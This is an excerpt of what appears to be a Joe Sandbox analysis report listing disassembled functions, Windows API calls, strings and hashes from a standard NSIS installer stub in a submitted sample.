                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$&B
                                                          • API String ID: 2246997448-2586977930
                                                          • Opcode ID: a1e1c377170db988000dc5bf323620cb1b71f62ab5c09594868df3b432e58a5c
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: a1e1c377170db988000dc5bf323620cb1b71f62ab5c09594868df3b432e58a5c
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                          • Null, xrefs: 00402EB5
                                                          • Error launching installer, xrefs: 00402E0C
                                                          • Inst, xrefs: 00402EA3
                                                          • soft, xrefs: 00402EAC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00405F6A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 0040434B Relevance: 13.6, APIs: 9, Instructions: 99windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,?,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,?,?), ref: 0040445A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                          • String ID:
                                                          • API String ID: 1008850623-0
                                                          • Opcode ID: c6750d1af7fc37b23261af89bb4d058a0a528e63e4caaafb760cc352ffb3986b
                                                          • Instruction ID: 9ba40c4e88974133cb4bfc637ea25183e969009e68af47c920173fa3a1066339
                                                          • Opcode Fuzzy Hash: c6750d1af7fc37b23261af89bb4d058a0a528e63e4caaafb760cc352ffb3986b
                                                          • Instruction Fuzzy Hash: D7319CB1A00109BFDB01AF64DC85A6E3BA9FB44744F00447AFA05BA2A0D7399E529B59
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          Function 004061DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8
                                                          • API String ID: 1453599865-4194326291
                                                          • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00402C9F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
